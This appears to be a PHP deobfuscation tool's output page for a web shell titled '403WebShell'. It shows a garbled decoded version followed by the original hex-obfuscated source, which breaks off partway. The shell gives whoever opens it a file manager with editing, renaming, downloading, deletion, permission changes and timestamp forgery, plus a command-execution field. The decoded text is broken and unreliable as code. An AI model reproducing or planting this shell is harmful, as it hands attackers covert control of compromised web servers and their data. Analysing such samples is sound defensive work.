            echo "<center>D"."ir : ".htmlspecialchars($_POST["loknya"])."<br>"; 
        echo "<form method=\"post">
		New Name : <input name="newname\" type="text\" class="up\" size="20\" value="".htmlspecialchars($ { 
            $ { 
            ($_POST["loknya"]))."" />
		<input type=\"hidden" name=\"loknya" value=\"".$_POST["loknya"]."">
		<input type=\"hidden" name="pilih" value=\"ubahnama">"; 
        if ($_POST["ty"."pe"] == "fi"."le") { 
            echo "<input type=\"hidden" name=\"type\" value=\"fi"."le">"; 
        } else { 
            echo "<input type=\"hidden" name=\"type" value="di"."r\">"; 
        echo "<input type="submit" value="Change" name=\"gantin\" class=\"up\" style="cursor: pointer; border-color: #fff\"/>
elseif(isset($_GET["pilihan"]) && $_POST["pilih"] == "edit") { 
    if (isset($_POST["gasedit"])) { 
        $ { 
            $ { 
        } =  @ $ { 
            $ { 
        ($_POST["loknya"], $_POST["src"]); 
        if ($ { 
            $ { 
            ($_POST["loknya"]) == $_POST["src"]) { 
            green("Ed"."it Fi"."le Suc"."ce"."ss !"); 
        } else { 
            red("Ed"."it Fi"."le Fai"."led !"); 
    $fvmwlghxk = "fgt"; 
    echo "<center>Fi"."le : ".htmlspecialchars($_POST["loknya"])."<br><br>"; 
    echo "<form method="post\">
	<textarea cols=80 rows=20 name="src\">".htmlspecialchars($ { 
	<input type=\"hidden" name="loknya\" value=\"".$_POST["loknya"]."\">
	<input type="hidden" name="pilih\" value=\"ed"."it\">
	<input type="submit" value=\"Ed"."it Fi"."le\" name="gasedit" class=\"up\" style="cursor: pointer; border-color: #fff"/>
elseif(isset($_POST["komends"])) { 
    if (isset($_POST["komend"])) { 
        if (isset($_GET["loknya"])) { 
            $ { 
            ["pvtsqa"] = "lk"; 
            $ { 
                $ { 
            } = $_GET["loknya"]; 
        } else { 
            $ { 
            ["cutiyhq"] = "gcw"; 
            $ { 
                $ { 
            } = $ { 
                $ { 
        $ { 
            $ { 
        } = "ko"."me"."nd"; 
        echo$ { 
            $ { 
        ($_POST["komend"], $ { 
            $ { 
elseif(isset($_POST["loknya"]) && $_POST["pilih"] == "ubahtanggal") { 
    if (isset($_POST["tanggale"])) { 
        $nfquxrj = "tanggale"; 
        $vkpomgphbpox = "tch"; 
        $ptyylpoymog = "stt"; 
        $ptqtey = "stt"; 
        $ { 
        } = "st"."rtot"."ime"; 
        $ { 
            $ { 
        } = "t"."ou"."ch"; 
        $viobgsudjjd = "tanggale"; 
        $ { 
        } = $ { 
        if ( @ $ { 
            ($_POST["loknya"], $ { 
            }) === true) { 
            $brvnilc = "b"; 
            $ { 
            ["fpiyunbt"] = "ftm"; 
            $ { 
            ["ekfbzwfikas"] = "det"; 
            green("Change Da"."te Succ"."ess !"); 
            $ { 
                $ { 
            } = "da"."te"; 
            $ { 
                $ { 
            } = "fi"."le"."mti"."me"; 
            $ { 
                $ { 
            } = $ { 
                $ { 
            ("d F Y H:i:s", $ { 
                $ { 
            if ($_POST["ty"."pe"] == "fi"."le") { 
                echo "<center>Fi"."le : ".htmlspecialchars($_POST["loknya"])."<br>"; 
            } else { 
                echo "<center>D"."ir : ".htmlspecialchars($_POST["loknya"])."<br>"; 
            echo "<form method="post\">
			New Da"."te : <input name="tanggal\" type=\"text" class=\"up\" size=\"20" value=\"".$ { 
            ."\" />
			<input type=\"hidden\" name=\"loknya" value="".$_POST["loknya"]."\">
			<input type=\"hidden" name=\"pilih\" value="ubahtanggal">"; 
            if ($_POST["ty"."pe"] == "fi"."le") { 
                echo "<input type="hidden\" name=\"type\" value="fi"."le">"; 
            } else { 
                echo "<input type="hidden\" name=\"type\" value="di"."r">"; 
            echo "<input type="submit\" value="Change" name="tanggale\" class="up\" style="cursor: pointer; border-color: #fff"/>
        } else { 
            red("Fai"."led to Cha"."nge Da"."te !"); 
    } else { 
        $njnknhljmk = "det"; 
        $ { 
        } = "da"."te"; 
        $ { 
            $ { 
        } = "fi"."le"."mti"."me"; 
        $ { 
            $ { 
        } = $ { 
            $ { 
        ("d F Y H:i:s", $ { 
            $ { 
        if ($_POST["ty"."pe"] == "fi"."le") { 
            echo "<center>Fi"."le : ".htmlspecialchars($_POST["loknya"])."<br>"; 
        } else { 
            echo "<center>D"."ir : ".htmlspecialchars($_POST["loknya"])."<br>"; 
        echo "<form method="post">
		New Da"."te : <input name=\"tanggal" type="text\" class=\"up\" size=\"20" value=\"".$ { 
            $ { 
        ."" />
		<input type=\"hidden" name=\"loknya" value="".$_POST["loknya"]."\">
		<input type=\"hidden\" name="pilih\" value="ubahtanggal">"; 
        if ($_POST["ty"."pe"] == "fi"."le") { 
            echo "<input type=\"hidden\" name="type\" value=\"fi"."le">"; 
        } else { 
            echo "<input type="hidden\" name="type\" value=\"di"."r">"; 
        echo "<input type="submit\" value=\"Change" name="tanggale" class=\"up\" style="cursor: pointer; border-color: #fff\"/>
elseif(isset($_POST["loknya"]) && $_POST["pilih"] == "dunlut") { 
    $kksnxccezhh = "dunlute"; 
    $ { 
    } = $_POST["loknya"]; 
    $pyqkcgmp = "dunlute"; 
    if ($ { 
        $ { 
        ($ { 
            $ { 
        }) && isset($ { 
        })) { 
        $ { 
        ["iuycvibsgn"] = "idr"; 
        $ivtnaykkylu = "ird"; 
        $jhgfwjiq = "fl"; 
        if ($ { 
            ($ { 
                $ { 
            })) { 
            dunlut($ { 
                $ { 
        elseif($ { 
            $ { 
            ($ { 
            })) { 
            red("That is Di"."rec"."tory, Not Fi"."le -_-"); 
        else { 
            red("Fi"."le is Not Re"."adab"."le !"); 
    } else { 
        red("Fi"."le Not Fo"."und !"); 
elseif(isset($_POST["loknya"]) && $_POST["pilih"] == "fo"."ld"."er") { 
    $opbhimmvv = "isw"; 
    if ($ { 
        ("./") || $ { 
        $ { 
        ("./")) { 
        $ { 
        ["whwcsod"] = "loke"; 
        $ { 
            $ { 
        } = $_POST["loknya"]; 
        if (isset($_POST["buatfolder"])) { 
            $ { 
                $ { 
            } = $ { 
                $ { 
            ($ { 
                $ { 
            $jfukylcf = "buatf"; 
            if ($ { 
                 == true) { 
                green("Folder <b>".htmlspecialchars($_POST["fo"."lde"."rba"."ru"])."</b> Created !"); 
                echo "<form method=\"post"><center>Folder : <input type="text" name="fo"."lde"."rba"."ru" class="up\"> <input type="submit" name="buatfolder\" value="Create folder" class=\"up" style="cursor: pointer; border-color: #fff\"><br><br></center>"; 
                echo "<input type=\"hidden" name="loknya\" value=\"".$_POST["loknya"]."\">
                <input type=\"hidden" name=\"pilih\" value=\"folder\"></form>"; 
            } else { 
                red("Failed to Create folder !"); 
                echo "<form method="post\"><center>Folder : <input type="text\" name=\"fo"."lde"."rba"."ru\" class="up\"> <input type="submit" name=\"buatfolder\" value="Create folder\" class="up" style=\"cursor: pointer; border-color: #fff\"><br><br></center>"; 
                echo "<input type=\"hidden" name=\"loknya\" value="".$_POST["loknya"]."">
                <input type=\"hidden" name="pilih\" value=\"folder"></form>"; 
        } else { 
            echo "<form method=\"post"><center>Folder : <input type=\"text\" name="fo"."lde"."rba"."ru" class="up"> <input type=\"submit\" name=\"buatfolder" value="Create folder" class="up\" style=\"cursor: pointer; border-color: #fff"><br><br></center>"; 
            echo "<input type="hidden\" name="loknya\" value=\"".$_POST["loknya"]."\"><input type=\"hidden" name="pilih" value="folder"></form>"; 
elseif(isset($_POST["lok"."nya"]) && $_POST["pilih"] == "fi"."le") { 
    $ { 
    ["ewulerz"] = "isw"; 
    if ($ { 
        $ { 
        ("./") || $ { 
        $ { 
        ("./")) { 
        $ { 
            $ { 
        } = $_POST["lok"."nya"]; 
        if (isset($_POST["buatfi"."le"])) { 
            $ { 
            ["pnfhbrr"] = "loke"; 
            $ { 
            ["gcoxaczxmxqq"] = "buatf"; 
            $ouexlqrhr = "fxt"; 
            $ { 
                $ { 
            } = $ { 
                $ { 
            ($ { 
                $ { 
                ."/".$_POST["fi"."lebaru"], ""); 
            if ($ { 
                ($ { 
                    $ { 
                    ."/".$_POST["fi"."lebaru"])) { 
                green("File <b>".htmlspecialchars($_POST["fi"."lebaru"])."</b> Created !"); 
                echo "<form method="post\"><center>Filename : <input type="text" name="fi"."lebaru\" class="up"> <input type=\"submit\" name=\"buatfi"."le\" value=\"Create File\" class=\"up" style=\"cursor: pointer; border-color: #fff\"><br><br></center>"; 
                echo "<input type=\"hidden\" name="loknya\" value=\"".$_POST["lok"."nya"]."\">
                <input type=\"hidden\" name=\"pilih" value=\"fi"."le"></form>"; 
            } else { 
                red("Failed to Create File !"); 
                echo "<form method=\"post"><center>Filename : <input type="text\" name=\"fi"."lebaru" class=\"up"> <input type=\"submit\" name="buatfi"."le\" value="Create File\" class="up\" style=\"cursor: pointer; border-color: #fff\"><br><br></center>"; 
                echo "<input type=\"hidden\" name="loknya" value=\"".$_POST["lok"."nya"]."\">
                <input type="hidden" name=\"pilih\" value=\"fi"."le"></form>"; 
        } else { 
            echo "<form method="post"><center>Filename : <input type=\"text" name=\"fi"."lebaru" class="up"> <input type="submit" name=\"buatfi"."le\" value=\"Create File\" class=\"up\" style="cursor: pointer; border-color: #fff"><br><br></center>"; 
            echo "<input type=\"hidden\" name=\"loknya\" value="".$_POST["lok"."nya"].""><input type=\"hidden\" name=\"pilih" value=\"fi"."le\"></form>"; 
echo "<div id=\"content"><table width="100%\" border="0" cellpadding=\"3" cellspacing="1" align="center\">
<tr class="first\">
<td><center>Las"."t Mo"."dif"."ied</center></td>
<td><center>Owner / Group</center></td>
echo "<tr>"; 
$ { 
    $ { 
} = $ { 
    $ { 
($ { 
    ($ { 
        $ { 
    }), "", $ { 
$ { 
    $ { 
} = $ { 
("//", "/", $ { 
echo "<td><i class='fa fa-folder' style='color: #ffe9a2'></i> <a href="?loknya=".$ { 
    $ { 
<td><center>".fdt($ { 
    $ { 
<td><center>".gor($ { 
})." / ".ggr($ { 
    $ { 
if ($ { 
    $ { 
    ($ { 
        $ { 
    echo "<font color=\"green\">"; 
elseif(!$ { 
    ($ { 
        $ { 
    }))echo "<font color=\"red\">"; 
echo statusnya($ { 
    $ { 
if ($ { 
    ($ { 
    }) || !$ { 
    $ { 
    ($ { 
    echo "</font>"; 
echo "</center></td>
<td><center><form method="POST" action=\"?pilihan&loknya=$lokasi\">
<input type="hidden\" name="type\" value="dir\">
<input type="hidden\" name="name\" value=\"$ppkcina">
<input type="hidden" name=\"loknya\" value=\"$lokasi/$ppkcina\">
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<button type='submit' class='btf' name='pilih' value='file'><i class='fa fa-file' style='color: #fff'></i></button>
echo "</tr>"; 
foreach($ { 
    $ { 
    as$ { 
}) { 
    $cwgxfiwh = "euybre"; 
    $ { 
    ["gpyknjl"] = "ppkcina"; 
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    $lwcfonlwjv = "euybre"; 
    $oyvkwv = "idi"; 
    $ { 
    } = $ { 
        $ { 
    ."/".$ { 
        $ { 
    $ { 
    } = $ { 
        $ { 
    ("//", "/", $ { 
    if (!$ { 
        ($ { 
            $ { 
        }) || $ { 
        $ { 
         == "." || $ { 
        $ { 
         == "..") 
    echo "<tr>"; 
    $dupbddiem = "euybre"; 
    echo "<td><i class='fa fa-folder' style='color: #ffe9a2'></i> <a href=\"?loknya=".$ { 
        $ { 
    ."\">".$ { 
	<td><center>".fdt($ { 
        $ { 
	<td><center>".gor($ { 
        $ { 
    })." / ".ggr($ { 
    if ($ { 
        $ { 
        ($ { 
            $ { 
        echo "<font color=\"green\">"; 
    elseif(!$ { 
        $ { 
        ($ { 
            $ { 
        }))echo "<font color="red">"; 
    echo statusnya($ { 
        $ { 
    if ($ { 
        $ { 
        ($ { 
            $ { 
        }) || !$ { 
        $ { 
        ($ { 
        echo "</font>"; 
    echo "</center></td>
	<td><center><form method="POST\" action="?pilihan&loknya=$lokasi\">
	<input type="hidden" name=\"type\" value=\"dir\">
	<input type=\"hidden" name=\"name" value="$ppkcina">
	<input type=\"hidden" name=\"loknya" value=\"$lokasi/$ppkcina">
	<button type='submit' class='btf' name='pilih' value='ubahnama'><i class='fa fa-pencil' style='color: #fff'></i></button>
	<button type='submit' class='btf' name='pilih' value='ubahtanggal'><i class='fa fa-calendar' style='color: #fff'></i></button>
	<button type='submit' class='btf' name='pilih' value='ubahmod'><i class='fa fa-gear' style='color: #fff'></i></button>
	<button type='submit' class='btf' name='pilih' value='hapus'><i class='fa fa-trash' style='color: #fff'></i></button>
echo "<tr class="first"><td></td><td></td><td></td><td></td><td></td><td></td></tr>"; 
$ { 
    $ { 
} = "10"."24"; 
foreach($ { 
    $ { 
    as$ { 
}) { 
    $xvkpqpcptrw = "size"; 
    $ocbsbfrhu = "size"; 
    $gxzhitfzw = "skd"; 
    $dxeplx = "isw"; 
    $ { 
    ["dhwrwjot"] = "rd"; 
    $yocjmhu = "fsz"; 
    $hpjvkrietd = "mekicina"; 
    $ { 
        $ { 
    } = $ { 
        $ { 
    ."/".$ { 
    if (!$ { 
        $ { 
    $ { 
    ["yqimmn"] = "euybray"; 
    $ { 
        $ { 
    } = $ { 
    ("$lokasi/$mekicina") / $ { 
        $ { 
    $ { 
    } = $ { 
        $ { 
    ($ { 
        $ { 
    }, 3); 
    $ { 
    ["cqbrntvk"] = "euybray"; 
    if ($ { 
         >= $ { 
    }) { 
        $ { 
            $ { 
        } = $ { 
            $ { 
        ($ { 
            $ { 
            /${${"GLOBALS"}["euvtvmso"]},2)." M"."B";}else{${${"GLOBALS"}["lgngxwnm"]}=${${"GLOBALS"}["lgngxwnm"]}." K"."B";}$cgtbnewny="isr";echo"<tr>
<td>".cfn(${${"GLOBALS"}["wwrwxibc"]})." <a href=\"?lokasie=$lokasi/$mekicina \ x26 \ x6co \ x6b \ x6e \ x79 \ x61 \ x3d$lokasi \ x22 > $mekicina <  / a \ x3e <  /  \ x74d \ x3e \ n \ x3c \ x74 \ x64 \ x3e < cen \ x74 \ x65 \ x72 \ x3e ".${${" \ x47 \ x4c \ x4f \ x42A \ x4c \ x53 "}[" lg \ x6eg \ x78 \ x77n \ x6d "]}." <  / c \ x65nt \ x65 \ x72 >  <  /  \ x74 \ x64 \ x3e \ n \ x3ctd \ x3e \ x3c \ x63e \ x6eter \ x3e ".fdt(${${" G \ x4cO \ x42AL \ x53 "}[" \ x77 \ x77 \ x72 \ x77 \ x78 \ x69 \ x62 \ x63 "]})." <  /  \ x63e \ x6et \ x65 \ x72 \ x3e <  /  \ x74d >  \ n <  \ x74d \ x3e <  \ x63e \ x6e \ x74 \ x65 \ x72 \ x3e ".gor(${${" \ x47 \ x4c \ x4fB \ x41 \ x4cS "}[" \ x63 \ x71 \ x62 \ x72 \ x6etvk "]})." \ x20 /  \ x20 ".ggr(${${" G \ x4cO \ x42 \ x41 \ x4c \ x53 "}[" \ x79 \ x71 \ x69 \ x6d \ x6dn "]})." <  / c \ x65 \ x6e \ x74 \ x65r \ x3e <  / t \ x64 \ x3e \ n < td \ x3e < c \ x65nter > ";if(${${" \ x47L \ x4f \ x42 \ x41 \ x4cS "}[" \ x66u \ x6f \ x74b \ x7a \ x69 \ x69 \ x70 \ x74 "]}(" $lokasi / $mekicina "))echo" < f \ x6fn \ x74 c \ x6f \ x6c \ x6f \ x72 =  \ x22g \ x72ee \ x6e \ x22 \ x3e ";elseif(!${$cgtbnewny}(" $lokasi / $mekicina "))echo" \ x3c \ x66 \ x6f \ x6et \ x20 \ x63 \ x6f \ x6c \ x6fr \ x3d \ "red\">"; echo statusnya("$lokasi/$mekicina"); if ($ { 
                ("$lokasi/$mekicina") || !$ { 
                $ { 
                echo "</font>"; echo "</center></td><td><center>
<form method="post\" action=\"?pilihan&loknya=$lokasi\">
<button type='submit' class='btf' name='pilih' value='edit'><i class='fa fa-edit' style='color: #fff'></i></button>
<button type='submit' class='btf' name='pilih' value='ubahnama'><i class='fa fa-pencil' style='color: #fff'></i></button>
<button type='submit' class='btf' name='pilih' value='ubahtanggal'><i class='fa fa-calendar' style='color: #fff'></i></button>
<button type='submit' class='btf' name='pilih' value='ubahmod'><i class='fa fa-gear' style='color: #fff'></i></button>
<button type='submit' class='btf' name='pilih' value='dunlut'><i class='fa fa-down"."load' style='color: #fff'></i></button>
<button type='submit' class='btf' name='pilih' value='hapus'><i class='fa fa-trash' style='color: #fff'></i></button>
<input type=\"hidden\" name=\"type" value="fi"."le">
<input type="hidden" name="name\" value=\"$mekicina">
<input type=\"hidden" name=\"loknya\" value=\"$lokasi/$mekicina\">
        echo "</tr></td></table></table>"; 
        function statusnya($fl) { 
            $ { 
                $ { 
            } = "sub"."st"."r"; 
            $ { 
            ["lruuneb"] = "c"; 
            $ { 
                $ { 
            } = "s"."pri"."ntf"; 
            $fdhpoui = "izin"; 
            $ { 
            ["rlcjlvucxetc"] = "fl"; 
            $ { 
                $ { 
            } = "fil"."eper"."ms"; 
            $vcxhzmxby = "a"; 
            $ { 
                $ { 
            } = $ { 
            ($ { 
                $ { 
                ("%o", $ { 
                    $ { 
                    ($ { 
                        $ { 
                    })), -4); 
            return$ { 
        ?  > ?>

Did this file decode correctly?

Original Code

 <  ? php $ {
["cq\x71\x6dd\x67e\x72"] = "\x69\x7a\x69\x6e";
$ {
["\x6c\x67\x6e\x67\x78w\x6em"] = "s\x69\x7a\x65";
$ {
["\x77\x77\x72\x77xi\x62\x63"] = "\x65\x75\x79\x62\x72ay";
$ {
["e\x75\x76\x74\x76\x6dso"] = "\x73kd";
$ {
["\x78\x78\x7a\x76\x63\x73\x66\x73s\x73"] = "\x65\x75y\x62\x72e";
$ {
["pf\x67u\x6f\x68\x65\x68\x6d\x70"] = "p\x70kci\x6ea";
$ {
["\x6c\x6f\x6e\x6b\x6f\x72xn\x75u\x6b"] = "l\x6fk\x61si\x6e\x79\x61";
$ {
["\x6e\x74r\x65\x67\x6fmp\x6f\x62s"] = "\x65u\x79br\x65\x6b\x77";
$ {
["\x6f\x68\x71n\x67\x6f"] = "\x6co\x6b\x65";
$qllaxizj = "\x69\x73\x77";
$ {
["\x74\x71\x77k\x77\x71bc\x70\x65\x79"] = "\x62uat\x66";
$ {
["\x72p\x64\x67\x76\x75\x61\x66"] = "\x69\x72d";
$ {
["y\x6a\x68\x78\x6f\x6ej\x63c\x6ap"] = "\x64un\x6c\x75\x74\x65";
$ {
["z\x68\x77v\x75\x79\x66"] = "\x64\x65\x74";
$ {
["\x65hji\x68\x64\x6b\x70v\x62\x6c"] = "\x66\x74\x6d";
$ {
["\x6az\x62ylp\x6f\x62\x6d\x69"] = "tc\x68";
$ {
["u\x66\x68\x6aeu\x72\x6c\x6ch\x74\x6a"] = "km";
$ {
["\x66\x6f\x76\x63\x78\x73\x75"] = "\x6ck";
$ {
["\x78\x77xo\x67\x66\x64\x67\x72"] = "e\x64\x69\x74";
$ {
["wg\x7ae\x69k\x72\x6co"] = "\x63\x65en";
$ {
["\x6a\x6e\x75\x70kiy\x6cl"] = "n\x61\x6d\x61\x62a\x72\x75";
$ {
["i\x73h\x74\x71\x62\x64u\x73q"] = "sp\x72";
$ {
["\x79\x79\x6bj\x74\x76\x64\x6av"] = "wb";
$ {
["\x71\x69\x67\x74\x6b\x6e\x75\x7ao"] = "\x73\x72l";
$ {
["h\x77ep\x72\x6ct"] = "s\x70\x73";
$ {
["\x78\x71\x68e\x6e\x78\x78\x78\x65k\x74g"] = "lwb";
$qulcfoo = "\x65uy\x62\x72\x65kw";
$ {
["n\x6d\x70v\x73\x67\x6d\x76"] = "\x66\x70t";
$ {
["b\x6c\x76vhr\x62\x65\x6as"] = "\x64\x61\x74\x61";
$ {
["\x72iv\x79\x78c\x65\x61x\x70"] = "\x69\x64";
$ {
["rc\x7a\x6f\x71\x66x\x67e\x79"] = "lok\x61\x73i\x73";
$ {
["\x6c\x62\x68\x73\x7amc\x6c\x76k\x65"] = "e\x78p";
$ {
["\x6df\x69\x74\x68\x66\x66\x64\x6d\x6d\x73"] = "gc\x77";
$ {
["\x62\x6f\x69\x75\x76\x62\x6cv\x77c"] = "\x6c\x6f\x6bd\x75\x61";
$ {
["\x6ee\x6f\x72\x67\x6aj\x6eu\x72nc"] = "s\x74\x73";
$ {
["\x6d\x70wyy\x69\x6c\x72\x75\x6by"] = "\x76\x61\x6c\x75\x65";
$ {
["m\x72\x70\x6b\x6c\x63u\x63y\x71\x64"] = "f\x78\x74";
$ {
["b\x65\x77\x72\x6b\x74\x65f\x68v\x69w"] = "\x66n\x63t";
$ {
["\x62\x6c\x76\x74y\x67"] = "\x70h\x76";
$ {
["gj\x79\x74\x61\x66\x76\x62\x6e"] = "\x67\x6d\x75";
$ {
["\x70\x6fe\x70\x67\x78\x71i\x66"] = "un\x6d";
$ {
["\x6b\x64\x6d\x74\x77fz\x7a"] = "\x6de\x6b\x69";
$ {
["\x75\x67\x69\x6c\x69\x63ze"] = "\x6b\x6fm";
$ {
["\x72f\x78y\x77\x63\x61h\x75h\x70"] = "\x78x";
$ {
["c\x6a\x66\x6e\x63\x77t"] = "\x78";
$ {
["xd\x79\x74g\x76\x79\x6b"] = "\x65";
$ {
["\x77c\x67\x69\x6a\x76\x74r\x75"] = "\x66l";
$ {
["\x76\x7a\x72\x78\x6aw\x69\x7aa"] = "\x64";
$ {
["vc\x79\x74\x6c\x67\x6cpl"] = "\x6c\x6fkny\x61";
$ {
["\x72\x67to\x79\x6dprh\x70"] = "\x63";
$tkvoiupuuh = "gc\x75";
$slwgvmneqh = "l\x6f\x6b\x61\x73\x69";
$ {
["\x65d\x6b\x6e\x6c\x66\x77ye\x70\x6a\x66"] = "\x6c\x6fk\x65\x6e\x61";
$ {
["\x61\x69\x72\x79d\x61m\x72p"] = "\x69t\x65\x6d\x73";
$ {
["\x72\x63\x70\x68l\x63p\x66"] = "\x70hv";
$ {
["\x64t\x74w\x66k\x77g\x6f\x68\x71"] = "\x61";
$ {
["m\x63\x79y\x77\x62"] = "\x62";
$ {
["\x65\x74\x75\x73t\x69r"] = "\x6c\x6f\x6b\x61\x73\x69";
$ {
["\x71\x76t\x6b\x6f\x69\x68"] = "gcu";
$nhavdr = "\x62s\x6e";
$ {
["s\x74\x68yn\x74\x62\x65\x6a\x61b\x77"] = "d\x69\x73\x66";
$ {
["p\x72\x61\x65\x67\x78nw"] = "di\x73fun\x63";
$ {
["\x6du\x66\x73z\x6a\x66\x62\x67\x67\x6e"] = "\x6dk\x64";
$ {
["\x74\x74\x6e\x6d\x74d"] = "b\x73n";
$ {
["\x78d\x67g\x6az\x61e"] = "\x72\x61\x64";
$ {
["\x69\x67\x63\x64\x74\x78"] = "\x67mu";
$ {
["\x6c\x74b\x79\x66\x7a\x71"] = "rd";
$ {
["c\x65bsyb\x71\x6e"] = "fs\x7a";
$ {
["\x67vl\x78as\x6a\x74\x77\x73o"] = "\x69\x73\x72";
$ {
["\x66\x75\x6f\x74\x62\x7a\x69\x69\x70\x74"] = "i\x73\x77";
$ {
["\x77\x62\x62o\x75s\x76\x73\x62\x75\x6f"] = "s\x75b";
$ {
["\x6cl\x66i\x72\x66w"] = "\x69\x66\x69";
$jpdyfixlnycq = "\x6c\x6f\x6ba\x73\x69\x6e\x79\x61";
$jrdowr = "\x73r\x6c";
$ekfugltcxo = "\x73p\x72";
$ {
["\x6c\x78\x78\x75\x79\x68e\x65\x78\x64\x64"] = "f\x70";
$eoitcpa = "igt";
$ {
["\x62g\x75ge\x61\x64c"] = "\x75lk";
$ {
["p\x6eu\x6fe\x63\x65g"] = "\x69di";
$ {
["g\x6dla\x6a\x62p\x76\x6c\x6b\x72"] = "sc\x64";
$iexhsdbjyeu = "f\x78\x74";
$ {
["r\x78h\x6d\x62nt"] = "\x66\x67t";
$ {
["\x73k\x62\x73\x69\x65\x66l\x71"] = "\x65xp";
$ {
["\x62s\x6f\x68\x61e\x65\x65\x65\x78"] = "\x72\x61\x64";
echo "\x25P\x44\x46-\n%PDF-\n<\x21D\x4fC\x54\x59\x50E\x20\x68\x74m\x6c>\n\x3c\x68tm\x6c>\n\x3c\x68e\x61\x64\x3e\n\t";
$ {
["\x76\x6f\x61\x63\x6b\x70\x68p\x67"] = "\x69s\x77";
$hxdbsgoc = "\x73\x74\x73";
$ymudwcszql = "\x66\x70\x74";
$ {
["\x73mh\x76vh\x65\x71o\x6ak"] = "\x63\x68\x6d";
echo "<\x74\x69t\x6c\x65>403"."We\x62"."Sh"."\x65\x6c"."\x6c\x3c/t\x69tl\x65\x3e";
echo "\t\x3c\x6d\x65t\x61 na\x6de=\"\x72\x6f\x62o\x74\x73\x22\x20\x63ont\x65\x6et=\"\x6e\x6fi\x6ed\x65\x78\"\x3e\n\x3c/\x68e\x61d>\n<b\x6fd\x79\x20bg\x63o\x6c\x6fr\x3d\"\x231\x66\x31f1f\x22\x20\x74ext=\"\x23\x66fffff\x22\x3e\n\x3cl\x69\x6ek\x20r\x65l\x3d\x22s\x74\x79\x6c\x65\x73\x68e\x65\x74\x22 \x68r\x65f=\x22h\x74\x74\x70\x73://cdnj\x73\x2e\x63\x6co\x75\x64flar\x65\x2eco\x6d/\x61\x6aax/l\x69\x62s/\x66\x6f\x6et-a\x77e\x73\x6fme/4.\x37\x2e0/\x63\x73s/f\x6fn\x74-aw\x65s\x6fme.\x6di\x6e.\x63\x73\x73\x22\x3e\n<\x73\x74\x79le\x3e\n\t\x40\x69m\x70\x6f\x72\x74\x20\x75r\x6c(\x27\x68\x74t\x70s://\x66\x6fn\x74s.\x67oogl\x65\x61pis.\x63om/\x63ss?fam\x69ly\x3d\x44o\x73is\x27)\x3b\n\t\x40im\x70or\x74\x20u\x72\x6c('\x68tt\x70s://fo\x6e\x74s.g\x6f\x6fgleap\x69\x73.c\x6f\x6d/\x63ss?fa\x6d\x69ly\x3d\x42\x75n\x67\x65\x65');\n\t\x40\x69\x6dpo\x72t\x20\x75rl('\x68\x74\x74p\x73://\x66ont\x73.g\x6f\x6fgle\x61\x70is\x2e\x63o\x6d/c\x73\x73?\x66a\x6di\x6c\x79\x3d\x52\x75\x73s\x6f+One');\n\x62o\x64\x79\x20{\n\tf\x6fn\x74-f\x61\x6d\x69l\x79: \"Con\x73\x6fl\x61\x73\",\x20\x63\x75\x72s\x69\x76\x65\x3b\n\tt\x65xt-\x73had\x6f\x77:\x30\x70x \x30\x70x\x20\x31\x70x\x20#757\x3575;\n}\n\nb\x6f\x64y::-\x77\x65\x62k\x69t-\x73\x63r\x6f\x6clb\x61\x72 {\n\x20\x20w\x69\x64\x74\x68:\x20\x31\x32\x70x;\n}\n\n\x62\x6f\x64y::-\x77e\x62kit-\x73c\x72ollbar-\x74r\x61ck {\n\x20\x20\x62\x61\x63\x6b\x67r\x6fu\x6e\x64:\x20\x231f1f\x31\x66;\n}\n\nbody::-w\x65\x62k\x69\x74-\x73\x63ro\x6c\x6cb\x61r-\x74hum\x62 {\n\x20 \x62\x61\x63\x6b\x67\x72ou\x6e\x64-\x63\x6f\x6c\x6fr: \x23\x31f1f1f;\n  \x62o\x72\x64er:\x203px \x73\x6fli\x64\x20g\x72\x61y\x3b\n}\n\n\x23c\x6fntent tr:\x68\x6f\x76e\x72\x20{\n\tb\x61c\x6bg\x72\x6f\x75n\x64-\x63\x6f\x6c\x6f\x72: #\x36\x336\x32\x36\x33\x3b\n\ttext-s\x68\x61d\x6f\x77:0p\x78 \x30\x70x\x20\x31\x30px #f\x66f;\n}\n\n#\x63\x6fnten\x74\x20.f\x69rst\x20{\n\tb\x61\x63kgro\x75n\x64-\x63o\x6c\x6fr:\x20\x23\x35e5e\x35e;\n}\n\n#\x63ont\x65\x6e\x74 .fi\x72s\x74:\x68ov\x65\x72 {\n\tb\x61\x63kgrou\x6e\x64-\x63\x6fl\x6fr: #2\x35\x3383\x43\x3b\n\t\x74\x65xt-s\x68a\x64o\x77:0p\x78\x200p\x78\x201\x70x #7\x35\x37\x35\x37\x35;\n}\n\nta\x62le\x20{\n\tbo\x72\x64\x65\x72: \x31\x70\x78\x20\x2300\x30\x30\x30\x30 \x64ot\x74\x65d;\n\t\x74\x61\x62\x6ce-\x6c\x61\x79\x6f\x75t: \x66\x69\x78e\x64;\n}\n\n\x74\x64 {\n\t\x77or\x64-wr\x61p:\x20bre\x61k-w\x6frd\x3b\n}\n\na\x20{\n\t\x63\x6flor: #\x64f\x35;\n\t\x74e\x78t-\x64ec\x6frat\x69\x6fn:\x20no\x6ee;\n}\n\na:ho\x76er\x20{\n\tc\x6flor:\x20#\x30\x30\x300\x30\x30\x3b\n\t\x74e\x78\x74-\x73\x68a\x64o\x77:0px\x20\x30p\x78\x201\x30\x70x #ff\x66fff;\n}\n\nin\x70ut,s\x65\x6cec\x74,t\x65x\x74ar\x65\x61\x20{\n\t\x62or\x64\x65r:\x201\x70\x78\x20\x23\x3000\x3000\x20s\x6f\x6cid\x3b\n\t-moz-\x62\x6f\x72de\x72-rad\x69us: \x35p\x78;\n\t-\x77\x65bk\x69\x74-\x62\x6f\x72de\x72-\x72adiu\x73:5p\x78\x3b\n\t\x62\x6frder-\x72a\x64i\x75s:5\x70\x78;\n}\n\n\x2eg\x61\x73\x20{\n\tb\x61ck\x67\x72\x6fund-\x63olor: \x23\x31\x661f1f\x3b\n\t\x63\x6fl\x6fr: #ff\x66\x66ff;\n\t\x63u\x72s\x6f\x72:\x20\x70o\x69\x6e\x74\x65\x72;\n}\n\n\x73ele\x63t {\n\t\x62\x61\x63\x6bg\x72\x6fu\x6ed-color: \x74\x72\x61\x6espar\x65nt;\n\t\x63\x6f\x6co\x72:\x20#\x66ff\x66ff\x3b\n}\n\n\x73ele\x63t:\x61\x66t\x65\x72\x20{\n\tcursor: \x70oin\x74\x65r;\n}\n\n\x2e\x6c\x69\x6ek\x61 {\n\t\x62\x61ck\x67\x72ound-\x63o\x6c\x6fr: t\x72\x61\x6es\x70\x61r\x65nt;\n\t\x63ol\x6f\x72: 